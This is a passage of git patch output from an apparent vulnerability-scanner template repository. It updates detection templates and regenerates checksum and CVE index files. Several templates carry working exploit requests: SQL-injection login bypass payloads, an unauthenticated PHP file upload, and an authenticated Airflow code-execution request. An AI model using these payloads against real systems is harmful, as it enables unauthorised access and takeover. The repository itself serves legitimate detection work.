2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b7a57b901a..d9bc34ab75 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ http/cves/2016/CVE-2016-10973.yaml +http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml From 7219ee5e96d6f27cea2ff153899c87fefb1cf052 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 07:01:53 +0000 Subject: [PATCH 562/609] TemplateMan Update [Mon Jul 10 07:01:53 UTC 2023] :robot: --- http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml index 4523491635..64f504f01a 100644 --- a/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml +++ b/http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml @@ -8,6 +8,7 @@ info: - https://twitter.com/0xperator/status/1677873700610162690 - https://github.com/alex14324/Rhadamanthys-Stealer metadata: + max-request: 1 verified: true tags: c2,rhadamanthys,stealer,panel From e1d932a078b8d70fbbbf549164cfa44e3d091664 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 10 Jul 2023 13:32:45 +0530 Subject: [PATCH 563/609] matcher update --- cves/2022/CVE-2022-40127.yaml | 22 ++++++++++++++-------- 1 file changed, 14 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-40127.yaml b/cves/2022/CVE-2022-40127.yaml index f08ebebe5e..a28949c6ca 100644 --- a/cves/2022/CVE-2022-40127.yaml +++ b/cves/2022/CVE-2022-40127.yaml @@ -1,7 +1,7 @@ id: CVE-2022-40127 info: - name: AirFlow < 2.4.0 - RCE + name: AirFlow < 2.4.0 - Remote Code Execution author: DhiyaneshDk,ritikchaddha severity: high description: | @@ -10,24 +10,27 @@ info: - https://github.com/Mr-xn/CVE-2022-40127 - https://nvd.nist.gov/vuln/detail/CVE-2022-40127 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2022-40127 + cwe-id: CWE-94 + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: + max-request: 3 + verified: true shodan-query: title:"Sign In - Airflow" - tags: cve,cve2022,airflow,rce,oast + tags: cve,cve2022,airflow,rce,oast,authenticated -requests: +http: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} - | POST /login/ HTTP/1.1 Host: {{Hostname}} - Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} @@ -35,9 +38,7 @@ requests: @timeout: 15s POST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1 Host: {{Hostname}} - Accept: application/json Content-Type: application/json - Origin: {{BaseURL}} { "conf": { @@ -56,6 +57,11 @@ requests: words: - 'state": "queued"' + - type: word + part: interactsh_protocol + words: + - dns + - type: status status: - 200 From 865feb47b8ed29c916c9088a13068573b9e348e3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 08:09:18 +0000 Subject: [PATCH 564/609] Auto Generated New Template Addition List [Mon Jul 10 08:09:18 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d9bc34ab75..b3808adc81 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/cves/2016/CVE-2016-10973.yaml +http/cves/2023/CVE-2023-2982.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml From dcefc279dc6f268687a246d5767f7d12068646ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 08:09:46 +0000 Subject: [PATCH 565/609] Auto Generated Templates Checksum [Mon Jul 10 08:09:46 UTC 2023] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6e33b206ca..8c3694199c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2334,6 +2334,7 @@ http/cves/2023/CVE-2023-29084.yaml:b0b7c4657722b17d7f32d8eabb161e3a07c17a72 http/cves/2023/CVE-2023-29489.yaml:5f37866efc6a153c648b2dc86491b8e58ef1a359 http/cves/2023/CVE-2023-29622.yaml:749c4f0cf235fe13a8fa9ed93c48344f8c7f965c http/cves/2023/CVE-2023-29623.yaml:0a3c4f7cbeb3ce6975f0c61487bc5c849e46ab79 +http/cves/2023/CVE-2023-2982.yaml:c34a4df8702a9f53f1f1f2194b0ba1d98e00bea4 http/cves/2023/CVE-2023-29887.yaml:511453838bafec32940df59bab8e92e1b59e8017 http/cves/2023/CVE-2023-29919.yaml:5442e826890010cd569b2a9fccf8c0cddd908d95 http/cves/2023/CVE-2023-29922.yaml:f89ff2f30ad00b2aaa054e80251634963c175245 @@ -2613,6 +2614,7 @@ http/exposed-panels/c2/hookbot-rat.yaml:9aa395e99970e3d4a6970f552ba71c923ba39ed4 http/exposed-panels/c2/mystic-stealer.yaml:7f96926be27c3ab5bda2aa86bef093cedb5dbed1 http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 +http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml:398cf78536de47186e1c530788b72152b42f1f9f http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f http/exposed-panels/cacti-panel.yaml:0ca8d96c8aa610c737b386304da03ab6997b9b39 http/exposed-panels/calendarix-panel.yaml:dc3833612b7af6913e9c109fc8397a59caa4855a @@ -6579,7 +6581,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:fae14432022aff6f4fa598ba32fda82847bec326 +templates-checksum.txt:cfcf62fc8f9cd2e1ee450df78fbb075d1307fa0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 33fdee9c776a1de1bf31d433e601c09ea49d7971 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 17:40:18 +0530 Subject: [PATCH 566/609] matchers and req update --- http/cves/2023/CVE-2023-33440.yaml | 61 ++++++++++++++---------------- 1 file changed, 28 insertions(+), 33 deletions(-) diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 35cf4ec524..7d34dab793 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -1,7 +1,7 @@ id: CVE-2023-33440 info: - name: Remote Code Execution - Faculty Evaluation System + name: Faculty Evaluation System v1.0 - Remote Code Execution author: Harsh severity: high description: | @@ -17,61 +17,56 @@ info: cwe-id: CWE-434 metadata: verified: true - tags: cve,cve2023,afu,rce,unauthenticated + tags: cve,cve2023,faculty,rce,intrusive http: - raw: - | - POST /eval/ajax.php?action=save_user HTTP/1.1 + POST /ajax.php?action=save_user HTTP/1.1 Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryV57DTxSo887Tnp4O + Content-Type: multipart/form-data; boundary=---------------------------1037163726497 - ------WebKitFormBoundaryV57DTxSo887Tnp4O + -----------------------------1037163726497 Content-Disposition: form-data; name="id" - - ------WebKitFormBoundaryV57DTxSo887Tnp4O + 1 + -----------------------------1037163726497 Content-Disposition: form-data; name="firstname" - test - ------WebKitFormBoundaryV57DTxSo887Tnp4O + Administrator + -----------------------------1037163726497 Content-Disposition: form-data; name="lastname" - test2 - ------WebKitFormBoundaryV57DTxSo887Tnp4O - Content-Disposition: form-data; name="img"; filename="hack.php" + a + -----------------------------1037163726497 + Content-Disposition: form-data; name="img"; filename="{{randstr}}.php" Content-Type: application/octet-stream - - ------WebKitFormBoundaryV57DTxSo887Tnp4O + + -----------------------------1037163726497 Content-Disposition: form-data; name="email" - abc@123.com - ------WebKitFormBoundaryV57DTxSo887Tnp4O + admin@admin.com + -----------------------------1037163726497 Content-Disposition: form-data; name="password" - 123456 - ------WebKitFormBoundaryV57DTxSo887Tnp4O + + -----------------------------1037163726497 Content-Disposition: form-data; name="cpass" - 123456 - ------WebKitFormBoundaryV57DTxSo887Tnp4O-- + + -----------------------------1037163726497-- - | - GET /eval/assets/uploads/ HTTP/1.1 + GET /login.php HTTP/1.1 Host: {{Hostname}} - - cookie-reuse: true - redirects: true + + host-redirects: true matchers: - type: dsl dsl: - - 'status_code_2 == 200' - - 'contains(body_2, "hack.php")' - - 'contains(body_2, "Index of /eval/assets/uploads")' + - 'status_code_1 == 200' + - 'regex("^1$", body_1)' + - '!regex("^2$", body_1)' + - 'len(body_1) == 1' + - 'contains(body_2, "Faculty Evaluation")' condition: and From 7a21bb6f232968fe0550f4ce8eaa20e2335eb749 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 17:55:32 +0530 Subject: [PATCH 567/609] matcher and req updated --- http/cves/2023/CVE-2023-33338.yaml | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 0b014a518f..c621e41257 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -1,7 +1,7 @@ id: CVE-2023-33338 info: - name: Old Age Home Management System - SQL Injection + name: Old Age Home Management System v1.0 - SQL Injection author: Harsh severity: critical description: | @@ -16,22 +16,26 @@ info: cwe-id: CWE-89 metadata: verified: true - tags: cve,cve2023,oahms,sql,unauthenticated,critical + tags: cve,cve2023,oahms,sqli,auth-bypass + http: - raw: - | - POST /oahms/admin/login.php HTTP/1.1 + POST /admin/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=vaday%27+or+1%3D1%23&password=password&submit= + - | + GET /admin/dashboard.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true - redirects: true matchers: - type: dsl dsl: - - 'status_code == 200' - - 'contains(body, "Admin")' - - 'contains(body, "Old Age Home Management System|| Dashboard")' + - 'status_code_2 == 200' + - 'contains(body_2, "Change Password")' + - 'contains(body_2, "Old Age Home Management System|| Dashboard")' condition: and From dd6be10dc8da9e9850f9b59a328c4e98e4b5d0bd Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 17:59:22 +0530 Subject: [PATCH 568/609] updated info --- http/cves/2022/CVE-2022-46071.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index a7ca50ca6d..7f67722a3a 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -16,19 +16,19 @@ info: cwe-id: CWE-89 metadata: verified: true - tags: cve,cve2022,sql,admin_bypass + tags: cve,cve2022,sqli,admin-bypass,helmet http: - raw: - | - POST /hss/classes/Login.php?f=login HTTP/1.1 + POST /classes/Login.php?f=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username='+OR+1%3D1+--+-&password=1234 - | - GET /hss/admin/ HTTP/1.1 + GET /admin/ HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -36,6 +36,5 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(body_2, "Helmet Store Showroom")' - - 'contains(body_2, "Adminstrator Admin")' + - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")' condition: and From facb115de16850d327576fd4c35ce36ef0b6d6eb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:32:50 +0000 Subject: [PATCH 569/609] Auto Generated New Template Addition List [Mon Jul 10 12:32:50 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b3808adc81..72dbc0a3a2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2016/CVE-2016-10973.yaml +http/cves/2022/CVE-2022-46071.yaml http/cves/2023/CVE-2023-2982.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml From ffee4e9853f6baf67b1f6a40ef7d03ca94a75621 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:32:52 +0000 Subject: [PATCH 570/609] Auto Generated cves.json [Mon Jul 10 12:32:52 UTC 2023] :robot: --- cves.json | 3 +++ cves.json-checksum.txt | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index ffe16aecdf..a099f9eb19 100644 --- a/cves.json +++ b/cves.json @@ -341,6 +341,7 @@ {"ID":"CVE-2016-10940","Info":{"Name":"WordPress zm-gallery plugin 1.0 SQL Injection","Severity":"high","Description":"zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2016/CVE-2016-10940.yaml"} {"ID":"CVE-2016-10956","Info":{"Name":"WordPress Mail Masta 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-10956.yaml"} {"ID":"CVE-2016-10960","Info":{"Name":"WordPress wSecure Lite \u003c 2.4 - Remote Code Execution","Severity":"high","Description":"WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-10960.yaml"} +{"ID":"CVE-2016-10973","Info":{"Name":"Brafton WordPress Plugin \u003c 3.4.8 - Cross-Site Scripting","Severity":"medium","Description":"The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-10973.yaml"} {"ID":"CVE-2016-10993","Info":{"Name":"ScoreMe Theme - Cross-Site Scripting","Severity":"medium","Description":"WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2016/CVE-2016-10993.yaml"} {"ID":"CVE-2016-1555","Info":{"Name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","Severity":"critical","Description":"NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-1555.yaml"} {"ID":"CVE-2016-2389","Info":{"Name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","Severity":"high","Description":"SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-2389.yaml"} @@ -1791,6 +1792,7 @@ {"ID":"CVE-2022-45917","Info":{"Name":"ILIAS eLearning \u003c7.16 - Open Redirect","Severity":"medium","Description":"ILIAS eLearning before 7.16 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45917.yaml"} {"ID":"CVE-2022-45933","Info":{"Name":"KubeView \u003c=0.1.31 - Information Disclosure","Severity":"critical","Description":"KubeView through 0.1.31 is susceptible to information disclosure. An attacker can obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication and retrieves certificate files that can be used for authentication as kube-admin. An attacker can thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-45933.yaml"} {"ID":"CVE-2022-46020","Info":{"Name":"WBCE CMS v1.5.4 - Remote Code Execution","Severity":"critical","Description":"WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46020.yaml"} +{"ID":"CVE-2022-46071","Info":{"Name":"Helmet Store Showroom v1.0 - SQL Injection","Severity":"critical","Description":"There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46071.yaml"} {"ID":"CVE-2022-46073","Info":{"Name":"Helmet Store Showroom - Cross Site Scripting","Severity":"medium","Description":"Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46073.yaml"} {"ID":"CVE-2022-46169","Info":{"Name":"Cacti \u003c=1.2.22 - Remote Command Injection","Severity":"critical","Description":"Cacti through 1.2.22 is susceptible to remote command injection. There is insufficient authorization within the remote agent when handling HTTP requests with a custom Forwarded-For HTTP header. An attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-46169.yaml"} {"ID":"CVE-2022-46381","Info":{"Name":"Linear eMerge E3-Series - Cross-Site Scripting","Severity":"medium","Description":"Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46381.yaml"} @@ -1886,6 +1888,7 @@ {"ID":"CVE-2023-29489","Info":{"Name":"cPanel - Cross-Site Scripting","Severity":"medium","Description":"An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29489.yaml"} {"ID":"CVE-2023-29622","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"Purchase Order Management v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /purchase_order/admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-29622.yaml"} {"ID":"CVE-2023-29623","Info":{"Name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"Purchase Order Management v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the password parameter at /purchase_order/classes/login.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-29623.yaml"} +{"ID":"CVE-2023-2982","Info":{"Name":"Miniorange Social Login and Register \u003c= 7.6.3 - Authentication Bypass","Severity":"critical","Description":"The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2982.yaml"} {"ID":"CVE-2023-29887","Info":{"Name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","Severity":"high","Description":"A Local File inclusion vulnerability in test.php in spreadsheet-reader 0.5.11 allows remote attackers to include arbitrary files via the File parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-29887.yaml"} {"ID":"CVE-2023-29919","Info":{"Name":"SolarView Compact \u003c= 6.00 - Local File Inclusion","Severity":"high","Description":"There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-29919.yaml"} {"ID":"CVE-2023-29922","Info":{"Name":"PowerJob V4.3.1 - Authentication Bypass","Severity":"high","Description":"PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.\n","Classification":{"CVSSScore":"8.9"}},"file_path":"http/cves/2023/CVE-2023-29922.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a4b4e62a9b..976b2057bc 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -62637697ea3959413498353a713eae14 +71cb01b4b767304cc2d01ec9b2d3bb19 From 94011daca6e61f79e5f176fd0e4d60cfad8824f8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:33:05 +0000 Subject: [PATCH 571/609] Auto Generated Templates Checksum [Mon Jul 10 12:33:05 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8c3694199c..c9971f332b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2239,6 +2239,7 @@ http/cves/2022/CVE-2022-45835.yaml:5f4b590f00df7eff3055f62f3f7808905fec9129 http/cves/2022/CVE-2022-45917.yaml:0226b686f5fd79959cafe8ae966fd89d5a2dbce6 http/cves/2022/CVE-2022-45933.yaml:5e00a22a676d7eda5a57443146b560b0608a1975 http/cves/2022/CVE-2022-46020.yaml:ba3769558e37986e70e73ddd1577bdb353915229 +http/cves/2022/CVE-2022-46071.yaml:5ca0e0d85e2b8eb9aadc2ff2d85e5dc8ea01a24c http/cves/2022/CVE-2022-46073.yaml:f80767fd442397daf63272de14f15bfdb8b0d4b3 http/cves/2022/CVE-2022-46169.yaml:562e09c425a29df8e43ffcb45dfcf005dd7c6767 http/cves/2022/CVE-2022-46381.yaml:ce9bf2978927607fd30ccf68be73583dfa5ea4c8 @@ -6581,7 +6582,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:cfcf62fc8f9cd2e1ee450df78fbb075d1307fa0f +templates-checksum.txt:00d1d7fafb20de586f28f92e2cc59e8a258a9a0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From fc66404c98648d118c7c4d54a2cee4f6d0e44c79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:33:47 +0000 Subject: [PATCH 572/609] Auto Generated New Template Addition List [Mon Jul 10 12:33:47 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 72dbc0a3a2..6c30bd2130 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2016/CVE-2016-10973.yaml http/cves/2022/CVE-2022-46071.yaml http/cves/2023/CVE-2023-2982.yaml +http/cves/2023/CVE-2023-33338.yaml http/exposed-panels/c2/rhadamanthys-stealer-panel.yaml From 5a71f62fafb9c63786030d955a0f5672d7140e7c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:33:56 +0000 Subject: [PATCH 573/609] Auto Generated Templates Checksum [Mon Jul 10 12:33:56 UTC 2023] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c9971f332b..b15439b8ce 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:7124209614af6f4ec3e30658be306efe87a09d19 TEMPLATES-STATS.md:4f2deb87b601b234429cf10252ba4c2b9fc4da62 TOP-10.md:dbe627b6ea3081d74929073a986a86c4e82b4130 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:bd710463bea4e310c9dbef8cffd55c5732f0234b -cves.json-checksum.txt:e4554db6bd79f6d36493eaab72348980145431ff +cves.json:28095ec889826240f81160ac58822331cf6c3009 +cves.json-checksum.txt:831a91aa2026bcf832121030806fa1c64297229f dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/cname-fingerprint.yaml:f7200ff1f3b3f96a7a92ddd6b49e5e5abe1d2377 @@ -2350,6 +2350,7 @@ http/cves/2023/CVE-2023-31548.yaml:41c807ff8ce21615be1f3f531a0934058fe10154 http/cves/2023/CVE-2023-32235.yaml:2909b3e8f2c2ca01442dee5be54755312d8f5453 http/cves/2023/CVE-2023-32243.yaml:24a096e3028c614b8c2632b25c68fc7a9960646f http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 +http/cves/2023/CVE-2023-33338.yaml:428e6d80c4381571a0b69b78c3c58eaa6e66a0df http/cves/2023/CVE-2023-33439.yaml:a4c7ce41b77f99923478040575ac6a72a9cfd5f3 http/cves/2023/CVE-2023-33510.yaml:9882010f9db532ca34df9dcf3e62a4d5a92746c6 http/cves/2023/CVE-2023-33568.yaml:b70b62eb98696ce5488db3f1988b359cca67f564 @@ -6582,7 +6583,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:00d1d7fafb20de586f28f92e2cc59e8a258a9a0f +templates-checksum.txt:d5ef1d1c702a959630b21bfad34ba1ff3626183a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 02599a324a7182eb7de4f0adfe9d8455739ffef0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:34:24 +0000 Subject: [PATCH 574/609] TemplateMan Update [Mon Jul 10 12:34:24 UTC 2023] :robot: --- http/cves/2022/CVE-2022-46071.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 7f67722a3a..b6558c5140 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2022-46071 cwe-id: CWE-89 metadata: + max-request: 2 verified: true tags: cve,cve2022,sqli,admin-bypass,helmet From 674cbf611fbc5b72a2a7256ebc5e22f69a5741bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 10 Jul 2023 12:35:12 +0000 Subject: [PATCH 575/609] TemplateMan Update [Mon Jul 10 12:35:12 UTC 2023] :robot: --- http/cves/2023/CVE-2023-33338.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index c621e41257..b743ff264c 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -15,6 +15,7 @@ info: cve-id: CVE-2023-33338 cwe-id: CWE-89 metadata: + max-request: 2 verified: true tags: cve,cve2023,oahms,sqli,auth-bypass From 942bb169ca470e5bde21b2d9c7a809560620d0f0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 10 Jul 2023 18:07:31 +0530 Subject: [PATCH 576/609] fix --- http/cves/2023/CVE-2023-33440.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 7d34dab793..7d68015b5e 100644 --- 